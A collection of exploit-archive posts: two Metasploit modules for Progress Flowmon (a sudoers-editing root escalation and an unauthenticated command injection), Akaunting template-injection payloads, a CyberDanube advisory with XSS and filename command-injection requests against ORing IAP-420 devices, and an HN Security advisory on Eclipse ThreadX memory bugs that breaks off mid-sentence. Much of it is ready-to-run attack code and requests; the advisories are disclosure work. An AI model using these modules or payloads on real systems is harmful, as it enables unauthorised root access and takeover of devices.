<pre><code># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> include Msf::Post::File<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Progress Flowmon Local sudo privilege escalation',<br /> 'Description' => %q{<br /> This module abuses a feature of the sudo command on Progress Flowmon.<br /> Certain binary files are allowed to automatically elevate<br /> with the sudo command. This is based off of the file name. This<br /> includes executing a PHP command with a specific file name. If the<br /> file is overwritten with PHP code it can be used to elevate privileges<br /> to root. Progress Flowmon up to at least version 12.3.5 is vulnerable.<br /> },<br /> 'Author' => [<br /> 'Dave Yesland with Rhino Security Labs',<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],<br /> ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']<br /> ],<br /> 'DisclosureDate' => '2024-03-19',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> },<br /> 'SessionTypes' => ['shell', 'meterpreter'],<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Targets' => [['Automatic', {}]],<br /> 'Privileged' => true<br /> )<br /> )<br /> register_options([<br /> OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),<br /> ])<br /> end<br /><br /> def check<br /> score = 0<br /> score += 1 if read_file('/var/www/shtml/index.php')&.include?('FlowMon')<br /> score += 1 if read_file('/var/www/shtml/ui/manifest.json')&.include?('Flowmon Web Interface')<br /> score += 1 if exists?('/var/www/shtml/translate.php')<br /> vprint_status("Found #{score} indicators this is a Progress Flowmon product")<br /> return CheckCode::Detected if score > 0<br /><br /> return CheckCode::Safe<br /> end<br /><br /> def on_new_session(session)<br /> super<br /> print_status('Cleaning up addition to /etc/sudoers')<br /> if session.type.to_s.eql? 'meterpreter'<br /> session.sys.process.execute '/bin/sh', "-c \"sed -i '/^ADMINS ALL=(ALL) NOPASSWD: ALL$/d' /etc/sudoers\""<br /> elsif session.type.to_s.eql? 'shell'<br /> session.shell_command_token 'sed -i \'/^ADMINS ALL=(ALL) NOPASSWD: ALL$/d\' /etc/sudoers'<br /> end<br /> end<br /><br /> def cleanup<br /> super<br /> unless @index_php_contents.blank?<br /> print_status('Restoring /var/www/shtml/index.php file contents...')<br /> file_rm('/var/www/shtml/index.php')<br /> write_file('/var/www/shtml/index.php', @index_php_contents)<br /> end<br /> end<br /><br /> def exploit<br /> @index_php_contents = ''<br /> fail_with(Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable") unless writable?(datastore['WRITABLE_DIR'])<br /> exploit_file = "#{datastore['WRITABLE_DIR']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"<br /><br /> vprint_status("Saving payload as #{exploit_file}")<br /> write_file(exploit_file, generate_payload_exe)<br /> chmod(exploit_file)<br /> register_file_for_cleanup(exploit_file)<br /> @index_php_contents = read_file('/var/www/shtml/index.php')<br /> print_status('Overwriting /var/www/shtml/index.php with payload')<br /> cmd_exec('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')<br /> print_status('Executing sudo to elevate privileges')<br /> cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')<br /> cmd_exec("sudo '#{exploit_file}'")<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Akaunting 3.1.8 - Client Side Template Injection CSTI<br /># Exploit Author: tmrswrr<br /># Date: 30/05/2024<br /># Vendor: https://akaunting.com/forum<br /># Software Link: https://akaunting.com/apps/crm<br /># Vulnerable Version(s): 3.1.8<br /><br /><br />1 ) Login with admin cred and go to : Currencies > New Currency<br /> https://127.0.0.1/Akaunting/1/settings/currencies<br />2 ) Write SSTI payload : {{ Object.keys(this) }} Name field <br />3 ) Save it <br />4 ) You will be see result : <br /> "_uid", "_isVue",<br /> "__v_skip", "_scope",<br /> "$options", "_renderProxy",<br /> "_self", "$parent",<br /> "$root", "$children",<br /> "$refs",<br /> <br /> > {{ this.$root.$data }}<br /> > "form": {},<br /> "bulk_action": {<br /> "path": "currencies",<br /> "count": "",<br /> "value": "*",<br /> "message": "",<br /> "type": "",<br /> "show": false,<br /> "modal": false,<br /> "loading": false,<br /> "selected": [],<br /> <br /> > {{ Object.keys(this._self) }}<br /> > "_uid",<br /> "_isVue",<br /> "__v_skip",<br /> "_scope",<br /> "$options",<br /> "_renderProxy",<br /> "_self",<br /> "$parent",<br /> "$root",<br /> "$children",<br /> "$refs",<br /><br /><br /><br /> > {{$on.constructor('alert(1)')()}}<br /> > You will be see alert box<br /><br />=======================================================================================<br /><br />1 ) Login with admin cred and go to : Items > New Item<br /> https://127.0.0.1/Akaunting/1/common/items<br />2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers<br />3 ) Save it <br />4 ) You will be see result : <br /> 49<br /> <br /><br />====================================================================================<br /><br />1 ) Login with admin cred and go to :Settings > Taxes > New Tax<br /> https://127.0.0.1/Akaunting/1/settings/taxes/1/edit<br />2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers<br />3 ) Save it <br />4 ) You will be see result : <br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br />====================================================================================<br /><br /><br />1 ) Login with admin cred and go to : Banking > Transactions > New Income<br />https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income<br />2 ) Write SSTI payload : {{7*7}} Description field<br />3 ) Save it <br />4 ) You will be see result : <br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br /> <br />=======================================================================================<br /><br />1 ) Login with admin cred<br />https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit<br />2 ) Write SSTI payload : {{7*7}} Name field<br />3 ) Save it <br />4 ) You will be see result : <br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br /> > {{self}}<br /> > <br /><br /><br /> <br /> <br /><br /><br /></code></pre>
<pre><code># Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI)<br /># Exploit Author: tmrswrr<br /># Date: 30/05/2024<br /># Vendor: https://akaunting.com/forum<br /># Software Link: https://akaunting.com/apps/crm<br /># Vulnerable Version(s): 3.1.8<br /># Tested : https://www.softaculous.com/apps/erp/Akaunting<br /><br /><br />1 ) Login with admin cred and go to : Items > New Item<br /> https://127.0.0.1/Akaunting/1/common/items<br />2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers<br />3 ) Save it <br />4 ) You will be see result : <br /> 49<br /> <br /><br />====================================================================================<br /><br />1 ) Login with admin cred and go to :Settings > Taxes > New Tax<br /> https://127.0.0.1/Akaunting/1/settings/taxes/1/edit<br />2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers<br />3 ) Save it <br />4 ) You will be see result : <br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br />====================================================================================<br /><br /><br />1 ) Login with admin cred and go to : Banking > Transactions > New Income<br />https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income<br />2 ) Write SSTI payload : {{7*7}} Description field<br />3 ) Save it <br />4 ) You will be see result : <br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br /> <br />=======================================================================================<br /><br />1 ) Login with admin cred<br />https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit<br />2 ) Write SSTI payload : {{7*7}} Name field<br />3 ) Save it <br />4 ) You will be see result : <br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br /><br /><br /> <br /> <br /><br /><br /></code></pre>
<pre><code>CyberDanube Security Research 20240528-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| ORing IAP-420<br /> vulnerable version| 2.01e<br /> fixed version| -<br /> CVE number| CVE-2024-5410, CVE-2024-5411<br /> impact| High<br /> homepage| https://oringnet.com/<br /> found| 2024-01-19<br /> by| T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Founded in 2005, ORing specializes in developing innovative own-branded<br />products for industrial settings. Over the years, ORing has accumulated<br />abundant experience in wired and wireless network communications industry. In<br />line with the commercialization of 5G, ORing has stretched its arm into the<br />IIoT field, helping customers realize all kinds of IIoT applications such as<br />smart manufacturing, smart city, and industrial automation. With high product<br />quality and best customer services in mind, ORing has continued to launch<br />cutting-edge products catering to customer needs. ORing's products have been<br />widely adopted in surveillance, rail transport, industrial automation, power<br />substations, renewable energy, and marine industries with offices worldwide to<br />address customer needs in real time."<br /><br />Source: https://oringnet.com/en/about-us/company-profile<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />IAP-420 / 2.01e<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (CVE-2024-5410)<br />A Stored Cross-Site Scripting vulnerability was identified in the web interface<br />of the device. The SSID of the WiFi can be configured to contain arbitrary<br />JavaScript code. An attacker can exploit this vulnerability by luring a victim<br />to visit a malicious website. Furthermore, it is possible to hijack the session<br />of the attacked user.<br /><br /><br />2) Authenticated Command Injection (CVE-2024-5411)<br />The filename parameter of the config file upload is prone to a Command<br />Injection vulnerability. This vulnerability can only be exploited if a user is<br />authenticated to the web interface. This way, an attacker can invoke commands<br />and is able to get full control over the whole device.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (CVE-2024-5410)<br />Stored Cross-Site Scripting can be triggered by placing JavaScript code into<br />the SSID input field of the web interface as authenticated user. A single<br />request for injecting the script is shown below:<br />-------------------------------------------------------------------------------<br />POST /cgi-bin/wl_set.cgi HTTP/1.1<br />Host: 192.168.0.1<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 659<br />Connection: keep-alive<br />Cookie: auth=YWRtaW46YWRtaW4=<br />Upgrade-Insecure-Requests: 1<br /><br />sel_op_mode=client&sel_mssid=0&tf_ssid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sel_isolation=0&<br />sel_mssid_isolation=0&sel_auth_mode=0&rb_wep_authmode=0&sel_wep_enc_bits=0&<br />sel_wep_key_type=0&tf_key1=&tf_key2=&tf_key3=&tf_key4=&rb_wpapsk_authmode=0&<br />rb_wpapsk_enc=0&tf_wpa_key=&rb_wpa_authmode=0&rb_wpa_enc=0&tf_ip1=&tf_ip2=&<br />tf_ip3=&tf_ip4=&tf_radius_port=&tf_radius_key=&tf_ip1_1x=&tf_ip2_1x=&<br />tf_ip3_1x=&tf_ip4_1x=&tf_radius_port_1x=&tf_radius_key_1x=&bt_save=Save&<br />lang=en&channel=0&isolation=0&mssid_isolation=0&auth_mode=0&wep_authmode=0&<br />wpapsk_authmode=0&wpa_authmode=0&wpa_enc_type=0&wep_enc_bits=0&wep_key_type=0&<br />wep_key_index=0&ret_msg=<br />-------------------------------------------------------------------------------<br /><br />2) Authenticated Command Injection (CVE-2024-5411)<br />A command can be injected in the filename of the uploaded config. By sending a<br />request as shown below, the content of the current directory can be shown:<br />-------------------------------------------------------------------------------<br />POST /cgi-bin/admin_config.cgi?todo=upconf HTTP/1.1<br />Host: 10.69.10.2<br />User-Agent: Mozilla/5.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------347087158737672164432057801583<br />Content-Length: 563<br />Connection: keep-alive<br />Cookie: auth=YWRtaW46YWRtaW4=<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------347087158737672164432057801583<br />Content-Disposition: form-data; name="upfile"; filename="test.bin;ls${IFS}-la;"<br /><br /><br />-----------------------------347087158737672164432057801583<br />Content-Disposition: form-data; name="bt_upconf"<br /><br />Upload<br />-----------------------------347087158737672164432057801583<br />Content-Disposition: form-data; name="lang"<br /><br />en<br />-----------------------------347087158737672164432057801583<br />Content-Disposition: form-data; name="ret_msg_upconf"<br /><br /><br />-----------------------------347087158737672164432057801583--<br />-------------------------------------------------------------------------------<br />This request is equal to executing "ls -la" on the console of the device.<br /><br />-------------------------------------------------------------------------------<br />HTTP/1.0 200 OK<br />tar: can't open '/tmp/test.bin': No such file or directory<br />drwxr-xr-x 4 root root 1024 Mar 7 14:36 .<br />drwxr-xr-x 8 root root 1024 Jan 30 2024 ..<br />-rwxr-xr-x 1 root root 17572 Jan 30 2024 admin_config.cgi<br />-rwxr-xr-x 1 root root 17584 Jan 30 2024 admin_default.cgi<br />-rwxr-xr-x 1 root root 15984 Jan 30 2024 admin_fwup.cgi<br />-rwxr-xr-x 1 root root 12476 Jan 30 2024 admin_password.cgi<br />-rwxr-xr-x 1 root root 13164 Jan 30 2024 admin_restart.cgi<br />-rwxr-xr-x 1 root root 33336 Jan 30 2024 adv_filters.cgi<br />-rwxr-xr-x 1 root root 15032 Jan 30 2024 adv_misc.cgi<br />-rwxr-xr-x 1 root root 72168 Jan 30 2024 adv_rstp.cgi<br />-rwxr-xr-x 1 root root 6588 Jan 30 2024 backup_unit.cgi<br />[...]<br />-------------------------------------------------------------------------------<br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />None<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends Oring customers to upgrade the firmware to the latest<br />version available and to restrict network access to the management interface of<br />the device.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2024-02-06: Contacting ORing via support@oringnet.com. Automatic holiday reply.<br />2024-02-19: Asking for an update. No reply.<br />2024-02-28: Asking for an update. No reply.<br />2024-03-11: Searched for "cyber security manager" on LinkedIn. Contacted him<br /> and got the answer, that the content should be sent to<br /> "support@oringnet.com". Sent the advisory to this address directly.<br />2024-03-20: Asking for an update. No reply.<br />2024-04-10: Asking for an update. No reply.<br />2024-04-30: Including support_us@oringnet.com. Asking for an update. Added<br /> notification about responsible disclosure deadline. No reply.<br />2024-05-02: Including support_eu@oringnet.com. Asking for an update. Added<br /> notification about responsible disclosure deadline. No reply.<br />2024-05-27: Sent information that the advisory will be published on 2024-05-28.<br />2024-05-28: Public release of security advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2024<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Flowmon Unauthenticated Command Injection',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection vulnerability in Progress Flowmon<br /> versions before v12.03.02.<br /> },<br /> 'Author' => [<br /> 'Dave Yesland with Rhino Security Labs',<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2024-2389'],<br /> ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],<br /> ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']<br /> ],<br /> 'DisclosureDate' => '2024-04-23',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> },<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Targets' => [['Automatic', {}]],<br /> 'Privileged' => false,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/'])<br /> ])<br /> end<br /><br /> def execute_command(cmd)<br /> send_request_cgi(<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),<br /> 'method' => 'GET',<br /> 'vars_get' => {<br /> 'file' => rand_text_alphanumeric(8),<br /> 'lang' => rand_text_alphanumeric(8),<br /> 'pluginPath' => "$(#{cmd})"<br /> }<br /> )<br /> end<br /><br /> def exploit<br /> print_status('Attempting to execute payload...')<br /> execute_command(payload.encoded)<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited!")<br /><br /> uri = normalize_uri(target_uri.path, 'homepage/auth/login')<br /> res = send_request_cgi(<br /> 'uri' => uri,<br /> 'method' => 'GET'<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /> return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface'<br /><br /> # Use a regular expression to extract the version number from the response<br /> version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})<br /><br /> return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1]<br /><br /> print_status("Detected version: #{version[1]}")<br /><br /> if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')<br /> CheckCode::Vulnerable("Version #{version[1]} is vulnerable.")<br /> else<br /> CheckCode::Safe("Version #{version[1]} is not vulnerable.")<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>--[ HNS-2024-06 - HN Security Advisory - https://security.humanativaspa.it/<br /><br />* Title: Multiple vulnerabilities in Eclipse ThreadX<br />* OS: Eclipse ThreadX < 6.4.0<br />* Author: Marco Ivaldi <marco.ivaldi@hnsecurity.it><br />* Date: 2024-05-28<br />* CVE IDs and severity:<br /> * CVE-2024-2214 - High - 7.0 - CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H<br /> * CVE-2024-2212 - High - 7.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L<br /> * CVE-2024-2452 - High - 7.0 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L<br />* Advisory URLs: <br /> * https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-vmp6-qhp9-r66x<br /> * https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-v9jj-7qjg-h6g6<br /> * https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-h963-7vhw-8rpx<br />* Vendor URL: https://threadx.io/<br /><br /><br />--[ 0 - Table of contents<br /><br />1 - Summary<br />2 - Background<br />3 - Vulnerabilities<br /> 3.1 - CVE-2024-2214 - Ineffective array size check and static buffer overflow in Eclipse ThreadX<br /> 3.2 - CVE-2024-2212 - Integer wraparounds, under-allocations, and heap buffer overflows in in Eclipse ThreadX<br /> 3.3 - CVE-2024-2452 - Integer wraparound, under-allocation, and heap buffer overflow in Eclipse ThreadX NetX Duo<br /> 3.4 - Other bugs with potential security implications in Eclipse ThreadX NetX Duo and USBX<br />4 - Affected products<br />5 - Remediation<br />6 - Disclosure timeline<br />7 - Acknowledgments<br />8 - References<br /><br /><br />--[ 1 - Summary<br /><br />"Why don’t you pick on projects your own size, <br />quit tormenting the tiny ones!" <br /> -- The Grugq<br /><br />Azure RTOS was Microsoft's real-time operating system for IoT devices. At the<br />beginning of 2024, Microsoft contributed the Azure RTOS technology to the<br />Eclipse Foundation [1]. With the Eclipse Foundation as its new home, Azure RTOS<br />was rebranded as Eclipse ThreadX.<br /><br />Eclipse ThreadX is an advanced embedded development suite including a small but<br />powerful operating system that provides reliable, ultra-fast performance for<br />resource-constrained devices. It offers a vendor-neutral, open source, safety<br />certified OS for real-time applications, all under a permissive license. <br /><br />We reviewed ThreadX's source code hosted on GitHub [2] and identified multiple<br />security vulnerabilities that may cause memory corruption. Their impacts range<br />from denial of service to potential arbitrary code execution.<br /><br /><br />--[ 2 - Background<br /><br />Continuing our recent vulnerability research work in the IoT space [3] [4] [5],<br />we keep assisting open-source projects in finding and fixing vulnerabilities by<br />reviewing their source code. In December 2023, Azure RTOS, which one month<br />later was rebranded as Eclipse ThreadX, was selected as a target of interest.<br /><br />During the source code review, we made use of our Semgrep C/C++ ruleset [6] and<br />weggli pattern collection [7] to identify hotspots in code on which to focus<br />our attention.<br /><br /><br />--[ 3 - Vulnerabilities<br /><br />The vulnerabilities resulting from our source code review are briefly described<br />in the following sections.<br /><br /><br />--[ 3.1 - CVE-2024-2214 - Ineffective array size check and static buffer overflow in Eclipse ThreadX<br /><br />In Eclipse ThreadX before version 6.4.0, the `_Mtxinit()` function in the<br />Xtensa port was missing an array size check causing a memory overwrite.<br /><br />The vulnerability was spotted in the following file:<br />* /ports/xtensa/xcc/src/tx_clib_lock.c<br /><br />There was no error handling in case `lcnt` >= `XT_NUM_CLIB_LOCKS`. The program<br />would continue and the `tx_mutex_create()` would eventually corrupt memory by<br />writing outside the bounds of the `xclib_locks` static array:<br />```c<br />#ifdef TX_THREAD_SAFE_CLIB /* this file is only needed if using C lib */<br />...<br />#if XSHAL_CLIB == XTHAL_CLIB_XCLIB<br />...<br />static TX_MUTEX xclib_locks[XT_NUM_CLIB_LOCKS];<br />static uint32_t lcnt;<br />...<br />/**************************************************************************/<br />/* _Mtxinit - initialize a lock. Called once for each lock. */<br />/**************************************************************************/<br />void<br />_Mtxinit (_Rmtx * mtx)<br />{<br /> TX_MUTEX * lock;<br /><br /> if (lcnt >= XT_NUM_CLIB_LOCKS) { // VULN: empty if() body<br /> /* Fatal error */<br /> }<br /><br /> lock = &(xclib_locks[lcnt]);<br /> lcnt++;<br /><br /> /* See notes for newlib case below. */<br />#ifdef THREADX_TESTSUITE<br /> tx_mutex_create (lock, "Clib lock", 0);<br />#else<br /> tx_mutex_create (lock, "Clib lock", TX_INHERIT);<br />#endif<br /><br /> *mtx = lock;<br />}<br />```<br /><br />Fixes:<br />https://github.com/eclipse-threadx/threadx/pull/340<br /><br />See also:<br />https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-vmp6-qhp9-r66x<br /><br /><br />--[ 3.2 - CVE-2024-2212 - Integer wraparounds, under-allocations, and heap buffer overflows in in Eclipse ThreadX<br /><br />In Eclipse ThreadX before version 6.4.0, functions `xQueueCreate()` and<br />`xQueueCreateSet()` from the FreeRTOS compatibility API were missing parameter<br />checks. This could lead to integer wraparound, under-allocations, and heap<br />buffer overflows.<br /><br />The vulnerabilities were spotted in the following file:<br />* /utility/rtos_compatibility_layers/FreeRTOS/tx_freertos.c<br /><br />If an attacker could control `uxQueueLength` or `uxItemSize`, they could cause<br />an integer wraparound thus causing `txfr_malloc()` to allocate a small amount<br />of memory, exposing to subsequent heap buffer overflows (AKA BadAlloc-style<br />memory corruption):<br />```c<br />QueueHandle_t xQueueCreate(UBaseType_t uxQueueLength, UBaseType_t uxItemSize)<br />{<br /> txfr_queue_t *p_queue;<br /> void *p_mem;<br /> size_t mem_size;<br /> UINT ret;<br /><br /> configASSERT(uxQueueLength != 0u);<br /> configASSERT(uxItemSize >= sizeof(UINT));<br /><br />#if (TX_FREERTOS_AUTO_INIT == 1)<br /> if(txfr_initialized != 1u) {<br /> tx_freertos_auto_init();<br /> }<br />#endif<br /><br /> p_queue = txfr_malloc(sizeof(txfr_queue_t));<br /> if(p_queue == NULL) {<br /> return NULL;<br /> }<br /><br /> mem_size = uxQueueLength*(uxItemSize);<br /><br /> p_mem = txfr_malloc(mem_size); // VULN: integer wraparound and under-allocation<br /> if(p_mem == NULL) {<br /> txfr_free(p_queue);<br /> return NULL;<br /> }<br /><br /> TX_MEMSET(p_mem, 0, mem_size);<br /> TX_MEMSET(p_queue, 0, sizeof(*p_queue));<br /> p_queue->allocated = 1u;<br /> p_queue->p_mem = p_mem;<br /> p_queue->id = TX_QUEUE_ID;<br /><br /> p_queue->p_write = (uint8_t *)p_mem;<br /> p_queue->p_read = (uint8_t *)p_mem;<br /> p_queue->msg_size = uxItemSize;<br /> p_queue->queue_length = uxQueueLength;<br /><br /> ret = tx_semaphore_create(&p_queue->read_sem, "", 0u);<br /> if(ret != TX_SUCCESS) {<br /> return NULL;<br /> }<br /><br /> ret = tx_semaphore_create(&p_queue->write_sem, "", uxQueueLength);<br /> if(ret != TX_SUCCESS) {<br /> return NULL;<br /> }<br /><br /> return p_queue;<br />}<br />```<br /><br />If an attacker could control `uxEventQueueLengthi`, they could cause an integer<br />wraparound thus causing `txfr_malloc()` to allocate a small amount of memory,<br />exposing to subsequent heap buffer overflows (AKA BadAlloc-style memory<br />corruption):<br />```c<br />QueueSetHandle_t xQueueCreateSet(const UBaseType_t uxEventQueueLength)<br />{<br /> txfr_queueset_t *p_set;<br /> void *p_mem;<br /> ULONG queue_size;<br /> UINT ret;<br /><br /> configASSERT(uxEventQueueLength != 0u);<br /><br />#if (TX_FREERTOS_AUTO_INIT == 1)<br /> if(txfr_initialized != 1u) {<br /> tx_freertos_auto_init();<br /> }<br />#endif<br /><br /> p_set = txfr_malloc(sizeof(txfr_queueset_t));<br /> if(p_set == NULL) {<br /> return NULL;<br /> }<br /><br /> queue_size = sizeof(void *) * uxEventQueueLength;<br /> p_mem = txfr_malloc(queue_size); // VULN: integer wraparound and under-allocation<br /> if(p_mem == NULL) {<br /> txfr_free(p_set);<br /> return NULL;<br /> }<br /><br /> ret = tx_queue_create(&p_set->queue, "", sizeof(void *) / sizeof(UINT), p_mem, queue_size);<br /> if(ret != TX_SUCCESS) {<br /> TX_FREERTOS_ASSERT_FAIL();<br /> return NULL;<br /> }<br /><br /> return p_set;<br />}<br />```<br /><br />These functions are part of an external API to be used by user's applications.<br />The values of those parameters passed to the vulnerable functions depend on<br />user's code.<br /><br />Fixes:<br />https://github.com/eclipse-threadx/threadx/pull/339<br /><br />See also:<br />https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-v9jj-7qjg-h6g6<br /><br /><br />--[ 3.3 - CVE-2024-2452 - Integer wraparound, under-allocation, and heap buffer overflow in Eclipse ThreadX NetX Duo<br /><br />In Eclipse ThreadX NetX Duo before version 6.4.0, if an attacker could control<br />the parameters of `__portable_aligned_alloc()` they could cause an integer<br />wraparound and an allocation smaller than expected. This could cause subsequent<br />heap buffer overflows.<br /><br />The vulnerability was spotted in the following file:<br />* /addons/azure_iot/azure_iot_security_module/iot-security-module-core/deps/flatcc/include/flatcc/portable/paligned_alloc.h<br /><br />If an attacker could control the `size` or `alignment` arguments to the<br />`__portable_aligned_alloc()` function, they could cause an integer wraparound<br />thus causing `malloc()` to allocate a small amount of memory, exposing to<br />subsequent heap buffer overflows (AKA BadAlloc-style memory corruption):<br />```c<br />static inline void *__portable_aligned_alloc(size_t alignment, size_t size)<br />{<br /> char *raw;<br /> void *buf;<br /> size_t total_size = (size + alignment - 1 + sizeof(void *)); // VULN: integer wraparound<br /><br /> if (alignment < sizeof(void *)) {<br /> alignment = sizeof(void *);<br /> }<br /> raw = (char *)(size_t)malloc(total_size); // VULN: under-allocation BadAlloc style<br /> buf = raw + alignment - 1 + sizeof(void *);<br /> buf = (void *)(((size_t)buf) & ~(alignment - 1));<br /> ((void **)buf)[-1] = raw; // malloc ret is not checked; in case NULL is returned the program would crash here<br /> return buf;<br />}<br />```<br /><br />We spotted the same vulnerability in Azure IoT Preview source code at:<br />https://github.com/azure-rtos/azure-iot-preview/blob/master/azure_iot/azure_iot_security_module/iot-security-module-core/deps/flatcc/include/flatcc/portable/paligned_alloc.h<br /><br />The maintainers confirmed the vulnerability, but informed us that the Azure IoT<br />Preview repository was not part of a product. Therefore, it was removed<br />entirely.<br /><br />Fixes:<br />https://github.com/eclipse-threadx/netxduo/pull/227<br /><br />See also:<br />https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-h963-7vhw-8rpx<br /><br /><br />--[ 3.4 - Other bugs with potential security implications in Eclipse ThreadX NetX Duo and USBX<br /><br />In addition to the vulnerabilities covered in the previous sections, we also<br />reported a few other bugs with potential security implications that were not<br />considered as vulnerabilities by Eclipse ThreadX maintainers. As such, our<br />reports were declassed to standard issues for code improvement.<br /><br />The first one is an unsafe use of the return value of `snprintf()` that we<br />observed in Eclipse ThreadX NetX Duo, in the following file:<br />* /addons/azure_iot/nx_azure_iot_adu_agent.c<br /><br />The `snprintf()` API function returns the total length of the string it tried<br />to create, which could be larger than the actual length written; if an attacker<br />were able to craft input so that `update_id_length` became larger than<br />`NX_AZURE_IOT_ADU_AGENT_UPDATE_MANIFEST_SIZE` and if the return value were used<br />unsafely (e.g., as an array index) somewhere else in 